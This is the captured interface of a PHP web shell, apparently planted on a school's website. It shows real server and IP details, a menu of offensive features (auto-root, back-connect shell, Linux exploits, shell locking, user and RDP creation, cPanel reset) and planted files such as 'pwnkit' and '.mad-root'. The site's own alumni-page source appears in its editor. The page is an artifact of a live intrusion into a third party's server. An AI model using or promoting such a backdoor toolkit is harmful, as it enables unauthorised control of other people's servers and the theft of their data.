Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.118.162.8
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
basarke /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
videos
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.46
KB
-rw-r--r--
academic.php
10.43
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
basarke.zip
143.03
MB
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rw-r--r--
cengkeh.php
13.37
KB
-rw-r--r--
config.php
623
B
-rw-r--r--
contact.php
1.81
KB
-rw-r--r--
error_log
1020.31
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
5.98
KB
-rw-r--r--
gallery.php
1.53
KB
-rw-r--r--
header.php
11.21
KB
-rw-r--r--
index.php
17.7
KB
-rw-r--r--
index.php.OFF
17.63
KB
-rw-r--r--
news-coverage.php
1.63
KB
-rw-r--r--
pedagogy.php
1.25
KB
-rw-r--r--
prolayt.html
1.17
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rw-r--r--
shining-star.php
8.56
KB
-rw-r--r--
tc.php
3.14
KB
-rw-r--r--
theschool.php
4.28
KB
-rw-r--r--
toppers.php
5.37
KB
-rw-r--r--
ts.php
232
B
-rw-r--r--
video.php
1.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shining-star.php
<?php include('header.php'); ?> <div class="site-section ftco-subscribe-1 site-blocks-cover pb-4" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-end"> <div class="col-lg-6"> <h2 class="mb-0">Our Alumni</h2> </div> <div class="col-lg-6 text-right"> <a href="index.php">Home</a> <span class="mx-3 icon-keyboard_arrow_right"></span> <span class="current">Our Alumni</span> </div> </div> </div> </div> <!--Our Alumini Start--> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> <style> .mySlides {display:none;} .w3-display-container { border-radius: 10px; //position: relative; border: 3px solid #153455; } .w3-black, .w3-hover-black:hover { color: #fff!important; background-color: #0404048c!important; font-size: 13px!important; } </style> <div class="w3-container"> <h3 style="text-align:center;">Our Alumni</h3> </div> <div class="w3-content w3-display-container"> <?php $qurey = "SELECT * FROM `shining_star` WHERE status='active'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <div class="w3-display-container mySlides"> <img src="../myadmin/shining-star/<?php echo $row['photo'] ;?>" style="width:968; height:400;"> <div class="w3-display-bottomleft w3-large w3-container w3-padding-16 w3-black"> <b>Name: <?php echo $row['name'] ; ?></b><br> <b>Details:</b> <?php echo $row['detail'] ; ?> </div> </div> <?php } ?> <!--<button class="w3-button w3-display-left w3-black" onclick="plusDivs(-1)">❮</button> <button class="w3-button w3-display-right w3-black" onclick="plusDivs(1)">❯</button>--> </div><br><br><br> <script> var slideIndex = 0; carousel(); function carousel() { var i; var x = document.getElementsByClassName("mySlides"); for (i = 0; i < x.length; i++) { x[i].style.display = "none"; } slideIndex++; if (slideIndex > x.length) {slideIndex = 1} x[slideIndex-1].style.display = "block"; setTimeout(carousel, 5000); } </script> <!--Our Alumini End--> <!--CBSE CORNER Start--> <!--<?php if (isset($_GET['pageno'])) { $pageno = $_GET['pageno']; } else { $pageno = 1; } $no_of_records_per_page = 50; $offset = ($pageno-1) * $no_of_records_per_page; $total_pages_sql = "SELECT COUNT(*) FROM shining_star WHERE status='active'"; $result = mysqli_query($con, $total_pages_sql); $total_rows = mysqli_fetch_array($result)[0]; $total_pages = ceil($total_rows / $no_of_records_per_page); $sql = "SELECT * FROM shining_star WHERE status= 'active' LIMIT $offset, $no_of_records_per_page"; $result = mysqli_query($con, $sql); $counter=$offset+1; ?> --> <!--<div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-12"> <h2 class="section-title-underline mb-5"> <span>Our Alumni</span> </h2> </div> </div> </div> </div> <div class="slideshow-container"> <?php $sr_no = 1; while($row = mysqli_fetch_array($result)) {?> <div class="mySlides fade"> <div class="numbertext"><b><?php echo $sr_no ; ?></b></div> <img src="../myadmin/shining-star/<?php echo $row['photo'] ;?>" style="width:800; height:400; border: 5px solid #183661; border-radius: 10px;"> <div class="text"><b><?php echo $row['name'] ; ?></b></div> <div class="details"><?php echo $row['detail'] ; ?></div> </div> <?php $sr_no ++; }?> <a class="prev" onclick="plusSlides(-1)">❮</a> <a class="next" onclick="plusSlides(1)">❯</a> </div> </div><br>--> <!--<div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>Our Alumni</span> </h2> </div> </div> <div class="row"> <div class="col-lg-12"> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th>Sr.No.</th> <th>Name</th> <th>Details</th> <th>Photo</th> </tr> </thead> <tbody> <?php $sr_no = 1; while($row = mysqli_fetch_array($result)) {?> <tr> <td><?php echo $sr_no ; ?></td> <td><b><?php echo $row['name'] ; ?></b></td> <td style="font-size:13; color: #000;"><?php echo $row['detail'] ; ?></td> <td> <img src="../myadmin/shining-star/<?php echo $row['photo'] ;?>" width="170"/> </td> </tr> <?php $sr_no ++; }?> </tbody> </table> <br> </div> <ul class="pagination"> <li><a href="?pageno=1">First</a></li> <li class="<?php if($pageno <= 1){ echo 'disabled'; } ?>"> <a href="<?php if($pageno <= 1){ echo '#'; } else { echo "?pageno=".($pageno - 1); } ?>">Prev</a> </li> <li class="<?php if($pageno >= $total_pages){ echo 'disabled'; } ?>"> <a href="<?php if($pageno >= $total_pages){ echo '#'; } else { echo "?pageno=".($pageno + 1); } ?>">Next</a> </li> <li><a href="?pageno=<?php echo $total_pages; ?>">Last</a></li> </ul> </div> </div> </div>--> <!--CBSE CORNER End--> <!--<script> var slideIndex = 1; showSlides(slideIndex); function plusSlides(n) { showSlides(slideIndex += n); } function currentSlide(n) { showSlides(slideIndex = n); } function showSlides(n) { var i; var slides = document.getElementsByClassName("mySlides"); var dots = document.getElementsByClassName("dot"); if (n > slides.length) {slideIndex = 1} if (n < 1) {slideIndex = slides.length} for (i = 0; i < slides.length; i++) { slides[i].style.display = "none"; } for (i = 0; i < dots.length; i++) { dots[i].className = dots[i].className.replace(" active", ""); } slides[slideIndex-1].style.display = "block"; dots[slideIndex-1].className += " active"; } </script>--> <!--<style> tr td:nth-child(-n+3) { text-align: center; } th { text-align: center; } tr td:nth-child(2) { text-align: left; } </style>--> <!--<style> * {box-sizing: border-box} body {font-family: Verdana, sans-serif; margin:0} .mySlides {display: none} img {vertical-align: middle;} /* Slideshow container */ .slideshow-container { max-width: 800px; position: relative; margin: auto; } /* Next & previous buttons */ .prev, .next { cursor: pointer; position: absolute; top: 50%; width: auto; padding: 16px; margin-top: -22px; color: white; font-weight: bold; font-size: 18px; transition: 0.6s ease; border-radius: 0 3px 3px 0; user-select: none; } /* Position the "next button" to the right */ .next { right: 0; border-radius: 3px 0 0 3px; } /* On hover, add a black background color with a little bit see-through */ .prev:hover, .next:hover { background-color: rgba(0,0,0,0.8); } /* Caption text */ .text { color: #183661; font-size: 25px; padding: 3px; position: absolute; font-weight: 600; width: 100%; text-align: center; } .details { color: #000; padding: 20px; position: absolute; font-size: 18px; margin-top: 25px; text-align: center; width: 100%; } /* Number text (1/3 etc) */ .numbertext { color: #000; font-size: 15px; padding: 8px 12px; position: absolute; top: 0; } /* The dots/bullets/indicators */ .dot { cursor: pointer; height: 15px; width: 15px; margin: 0 2px; background-color: #bbb; border-radius: 50%; display: inline-block; transition: background-color 0.6s ease; } .active, .dot:hover { background-color: #717171; } /* Fading animation */ .fade { -webkit-animation-name: fade; -webkit-animation-duration: 1.5s; animation-name: fade; animation-duration: 1.5s; } @-webkit-keyframes fade { from {opacity: .4} to {opacity: 1} } @keyframes fade { from {opacity: .4} to {opacity: 1} } /* On smaller screens, decrease text size */ @media only screen and (max-width: 300px) { .prev, .next,.text {font-size: 11px} } </style>--> <?php include('footer.php'); ?>
Close